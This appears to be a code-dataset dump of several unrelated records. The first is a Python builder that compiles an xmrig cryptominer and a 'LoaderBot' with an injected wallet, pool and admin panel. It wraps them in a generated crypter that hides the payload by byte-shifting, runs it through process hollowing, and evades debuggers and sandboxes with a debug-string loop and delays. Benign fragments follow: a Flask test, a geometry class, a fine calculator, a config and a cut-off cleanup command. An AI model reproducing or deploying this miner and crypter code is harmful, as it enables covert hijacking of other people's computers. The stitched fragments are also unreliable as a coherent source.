ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 
'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-5": "import os, sys, time, random, subprocess\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%u%\", wallet)\n file = file.replace(\"%p%\", pool)\n file = file.replace(\"%w%\", ww)\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp\", \"w\") as w:\n w.write(file)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\ex.cs\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%l%\", logger)\n file = file.replace(\"%a%\", adminka)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\Program.cs\", \"w\") as w:\n w.write(file)\n\ndef writeBytes(key):\n with open(os.getcwd()+\"\\\\file.txt\", \"r\") as f:\n file = f.read()\n with open(os.getcwd()+\"\\\\Miner\\\\CryptRunPe\\\\winhost.cpp\", \"w\") as w:\n w.write(\"#include <stdafx.h>\\n#include \\\"process.h\\\"\\n #include \\\"memrun.h\\\"\\nusing namespace std;\\n\")\n with open(\"ex.txt\") as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\ndef compile(path, file):\n os.system(\"%windir%\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\t\ndef compileM(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\ndef compileR(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release /p:Platform=\\\"WIN32\\\"\")\ndef xcopy(path, out):\n try:\n with open(path, \"rb\") as f:\n file = f.read()\n with open(out, \"wb\") as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = '\\n\\\n #include <Windows.h>\\n\\\n #include <winternl.h>\\n\\\n #include <iostream>\\n\\\n #include <string>\\n\\\n #include <fstream>\\n\\\n using namespace std;\\n\\\n int main()\\n\\\n {\\n\\\n FILE * file = fopen(\"in.exe\", \"rb\");\\n\\\n if (file == NULL) return 0;\\n\\\n fseek(file, 0, SEEK_END);\\n\\\n long 
int size = ftell(file);\\n\\\n fclose(file);\\n\\\n file = fopen(\"in.exe\", \"rb\");\\n\\\n unsigned char * in = (unsigned char *)malloc(size);\\n\\\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] - 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"out.exe\", \"wb\");\\n\\\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] + 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"decr.exe\", \"wb\");\\n\\\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n return 0;\\n\\\n }\\n\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n os.system(\"g++ -o enc encoder.cpp\")\n os.system(\"C:\\Python27\\python.exe cv.py\")\n with open('file.txt', 'r') as r:\n with open(os.getcwd()+\"\\\\src\\\\crypter\\\\crypter.cpp\", \"w\") as w:\n txt = '\\\n #include \"stdafx.h\"\\n\\\n #include \"Crypter.h\"\\n\\\n #include <windows.h>\\n\\\n #include <winternl.h>\\n\\\n #pragma comment(lib,\"ws2_32.lib\")\\n\\\n #pragma comment(lib,\"ntdll.lib\")\\n\\\n '+ r.read() + '\\\n int RunPortableExecutable(void* Image) {\\n\\\n IMAGE_DOS_HEADER* DOSHeader;\\n\\\n IMAGE_NT_HEADERS* NtHeader;\\n\\\n IMAGE_SECTION_HEADER* SectionHeader;\\n\\\n PROCESS_INFORMATION PI;\\n\\\n STARTUPINFOA SI;\\n\\\n CONTEXT* CTX;\\n\\\n DWORD* ImageBase;\\n\\\n void* pImageBase;\\n\\\n int count;\\n\\\n char buffer[MAX_PATH];\\n\\\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\\n\\\n char *CurrentFilePath = buffer;\\n\\\n DOSHeader = PIMAGE_DOS_HEADER(Image);\\n\\\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\\n\\\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\\n\\\n ZeroMemory(&PI, sizeof(PI));\\n\\\n ZeroMemory(&SI, sizeof(SI));\\n\\\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\\n\\\n NtUnmapViewOfSection 
mNtUnmapViewOfSection;\\n\\\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\\n\\\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\\n\\\n CTX->ContextFlags = CONTEXT_FULL;\\n\\\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\\n\\\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\\n\\\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\\n\\\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\\n\\\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\\n\\\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\\n\\\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\\n\\\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\\n\\\n }\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\\n\\\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\\n\\\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\\n\\\n ResumeThread(PI.hThread);\\n\\\n return 0;\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\\n\\\n for (int i = 0; i < 550000; i++)\\n\\\n OutputDebugStringW(L\"\");\\n\\\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\\n\\\n unsigned char b = rawData[i] + 0x0%n%;\\n\\\n rawData[i] = b;\\n\\\n }\\n\\\n Sleep(((rand() % 5 + 1) + 5) * 1000);\\n\\\n RunPortableExecutable(rawData);\\n\\\n return 0;\\n\\\n }\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n compileM(os.getcwd()+\"\\\\src\\\\\", \"ConsoleApplication1\")\n 
xcopy(os.getcwd() + \"\\\\src\\\\Release\\\\Crypter.exe\", os.getcwd()+\"\\\\\"+name+\".exe\")\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\n\n\n\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd()+\"\\\\Bot\\\\\", \"LoaderBot\")\nxcopy(os.getcwd()+\"\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe\", \"Bot.exe\")\ncompileR(os.getcwd()+\"\\\\rig\\\\\", \"xmrig\")\nxcopy(os.getcwd()+\"\\\\rig\\\\Release\\\\xmrig.exe\", \"out.exe\")\ncrypt(\"test\", key)\nos.system(\"C:\\Python27\\python.exe cv.py\")\nwriteBytes(key)\ncompileM(os.getcwd()+\"\\\\Miner\\\\\", \"winhost\")\nxcopy(os.getcwd()+\"\\\\Miner\\\\Release\\\\winhost.exe\", \"in.exe\")\nprint(os.getcwd()+\"\\\\enc.exe\")\nsubprocess.call(os.getcwd()+\"\\\\enc.exe\")\ncrypt(\"winhost\", key)\n\nos.system(\"del file.txt\")\nos.system(\"del in.exe\")\nos.system(\"del out.exe\")\nos.system(\"del decr.exe\")\nos.system(\"del enc.exe\")\nos.system(\"del test.exe\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
# testa se uma aplicacao em modo de teste esta sendo construida
def test_config(app):
assert app.testing
|
normal
|
{
"blob_id": "96d7963faf720a3dc0d96b55ad65ee7ac83c1818",
"index": 5798,
"step-1": "<mask token>\n",
"step-2": "def test_config(app):\n assert app.testing\n",
"step-3": "# testa se uma aplicacao em modo de teste esta sendo construida\ndef test_config(app):\n assert app.testing\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import math
class Point:
def __init__(self, x: int, y: int):
self.x = x
self.y = y
def create_point(self):
point = [self.x, self.y]
return point
@staticmethod
def calculate_distance(point_1: [], point_2: []):
side_a = abs(point_1.x - point_2.x)
side_b = abs(point_1.y - point_2.y)
side_c = math.sqrt(side_a ** 2 + side_b ** 2)
return side_c
n = int(input())
total_points = []
while n > 0:
n -= 1
a, b = [int(x) for x in input().split()]
point = Point(a, b).create_point()
total_points.append(point)
segment_list = []
for index_1 in range(len(total_points)):
for index_2 in range(len(total_points)):
if index_1 != index_2:
segment = Point(total_points[index_1][0], total_points[index_2][0])
segment_list.append(segment)
|
normal
|
{
"blob_id": "cda7595e46528739cad49a5d62a80bc7b2087157",
"index": 1911,
"step-1": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\n<mask token>\nwhile n > 0:\n n -= 1\n a, b = [int(x) for x in input().split()]\n point = Point(a, b).create_point()\n total_points.append(point)\n<mask token>\nfor index_1 in range(len(total_points)):\n for index_2 in range(len(total_points)):\n if index_1 != index_2:\n segment = Point(total_points[index_1][0], total_points[index_2][0])\n segment_list.append(segment)\n",
"step-3": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\nn = int(input())\ntotal_points = []\nwhile n > 0:\n n -= 1\n a, b = [int(x) for x in input().split()]\n point = Point(a, b).create_point()\n total_points.append(point)\nsegment_list = []\nfor index_1 in range(len(total_points)):\n for index_2 in range(len(total_points)):\n if index_1 != index_2:\n segment = Point(total_points[index_1][0], total_points[index_2][0])\n segment_list.append(segment)\n",
"step-4": "import math\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\nn = int(input())\ntotal_points = []\nwhile n > 0:\n n -= 1\n a, b = [int(x) for x in input().split()]\n point = Point(a, b).create_point()\n total_points.append(point)\nsegment_list = []\nfor index_1 in range(len(total_points)):\n for index_2 in range(len(total_points)):\n if index_1 != index_2:\n segment = Point(total_points[index_1][0], total_points[index_2][0])\n segment_list.append(segment)\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
#!/usr/bin/python3
experiment_name = "nodes10"
wall = "wall2"
wall_image = "irati_110"
mr_dif_policy = True
spn_dif_policy = True
destination_ip = "2001:40b0:7500:286:84:88:81:57"
|
normal
|
{
"blob_id": "78db25586f742b0a20bc3fad382b0d4f1a271841",
"index": 3970,
"step-1": "<mask token>\n",
"step-2": "experiment_name = 'nodes10'\nwall = 'wall2'\nwall_image = 'irati_110'\nmr_dif_policy = True\nspn_dif_policy = True\ndestination_ip = '2001:40b0:7500:286:84:88:81:57'\n",
"step-3": "#!/usr/bin/python3\n\nexperiment_name = \"nodes10\"\nwall = \"wall2\"\nwall_image = \"irati_110\"\nmr_dif_policy = True\nspn_dif_policy = True\ndestination_ip = \"2001:40b0:7500:286:84:88:81:57\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
speed, lic_plate = input().split()
salary = int(0)
while lic_plate != "A999AA":
if int(speed) > 60:
if lic_plate[1] == lic_plate[2] and lic_plate [2] == lic_plate[3]:
salary += 1000
elif lic_plate[1] == lic_plate[2] or lic_plate [1] == lic_plate[3]:
salary += 500
elif lic_plate[2] == lic_plate[3]:
salary += 500
else:
salary += 100
speed, lic_plate = input().split()
print(salary)
|
normal
|
{
"blob_id": "ff8ffeb418bf4f9bc7d5dadd126ebc7c34c5c2cd",
"index": 4454,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n",
"step-3": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n",
"step-4": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != \"A999AA\":\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate [2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate [1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class CleanCommand(commands.Command):
<|reserved_special_token_0|>
def __init__(self):
super().__init__('clean', 'Clean up Pavilion working directory.',
short_help='Clean up Pavilion working diretory.')
def _setup_arguments(self, parser):
parser.add_argument('-v', '--verbose', action='store_true', default
=False, help='Verbose output.')
parser.add_argument('--older-than', nargs='+', action='store', help
=
'Set the max age of files to be removed. Can be a date ex:"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(days=int(args.
older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(weeks=int(args.
older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint('{} is not a valid date.'.format(args.
older_than), file=self.errfile, color=output.RED)
return errno.EINVAL
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
output.fprint('Removing Tests...', file=self.outfile, color=output.
GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /
test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint('Removing bad test directory {}'.format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
if (test_time < cutoff_date and status != STATES.RUNNING and
status != STATES.SCHEDULED):
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint('Removed test {}'.format(test), file=self
.outfile)
else:
if args.verbose:
output.fprint('Skipped test {}'.format(test), file=self
.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
completed_series = True
output.fprint('Removing Series...', file=self.outfile, color=output
.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(os.path.getmtime((
series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint('Removed series {}'.format(series),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped series {}'.format(series), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Downloads...', file=self.outfile, color=
output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(os.path.getmtime((
download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint('{} is not a directory.'.format(
download), file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint('Removed download {}'.format(download
), file=self.outfile)
elif args.verbose:
output.fprint('Skipped download {}'.format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Builds...', file=self.outfile, color=output
.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(os.path.getmtime((
build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint('Removed build {}'.format(build),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped build {}'.format(build), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed. '.
format(err[1]), file=self.errfile, color=31)
return 0
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CleanCommand(commands.Command):
"""Cleans outdated test and series run directories."""
def __init__(self):
super().__init__('clean', 'Clean up Pavilion working directory.',
short_help='Clean up Pavilion working diretory.')
def _setup_arguments(self, parser):
parser.add_argument('-v', '--verbose', action='store_true', default
=False, help='Verbose output.')
parser.add_argument('--older-than', nargs='+', action='store', help
=
'Set the max age of files to be removed. Can be a date ex:"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(days=int(args.
older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(weeks=int(args.
older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint('{} is not a valid date.'.format(args.
older_than), file=self.errfile, color=output.RED)
return errno.EINVAL
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
output.fprint('Removing Tests...', file=self.outfile, color=output.
GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /
test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint('Removing bad test directory {}'.format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
if (test_time < cutoff_date and status != STATES.RUNNING and
status != STATES.SCHEDULED):
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint('Removed test {}'.format(test), file=self
.outfile)
else:
if args.verbose:
output.fprint('Skipped test {}'.format(test), file=self
.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
completed_series = True
output.fprint('Removing Series...', file=self.outfile, color=output
.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(os.path.getmtime((
series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint('Removed series {}'.format(series),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped series {}'.format(series), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Downloads...', file=self.outfile, color=
output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(os.path.getmtime((
download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint('{} is not a directory.'.format(
download), file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint('Removed download {}'.format(download
), file=self.outfile)
elif args.verbose:
output.fprint('Skipped download {}'.format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Builds...', file=self.outfile, color=output
.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(os.path.getmtime((
build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint('Removed build {}'.format(build),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped build {}'.format(build), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed. '.
format(err[1]), file=self.errfile, color=31)
return 0
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CleanCommand(commands.Command):
"""Cleans outdated test and series run directories."""
def __init__(self):
super().__init__('clean', 'Clean up Pavilion working directory.',
short_help='Clean up Pavilion working diretory.')
def _setup_arguments(self, parser):
parser.add_argument('-v', '--verbose', action='store_true', default
=False, help='Verbose output.')
parser.add_argument('--older-than', nargs='+', action='store', help
=
'Set the max age of files to be removed. Can be a date ex:"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(days=int(args.
older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(weeks=int(args.
older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint('{} is not a valid date.'.format(args.
older_than), file=self.errfile, color=output.RED)
return errno.EINVAL
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
output.fprint('Removing Tests...', file=self.outfile, color=output.
GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /
test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint('Removing bad test directory {}'.format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
if (test_time < cutoff_date and status != STATES.RUNNING and
status != STATES.SCHEDULED):
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint('Removed test {}'.format(test), file=self
.outfile)
else:
if args.verbose:
output.fprint('Skipped test {}'.format(test), file=self
.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
completed_series = True
output.fprint('Removing Series...', file=self.outfile, color=output
.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(os.path.getmtime((
series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint('Removed series {}'.format(series),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped series {}'.format(series), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Downloads...', file=self.outfile, color=
output.GREEN)
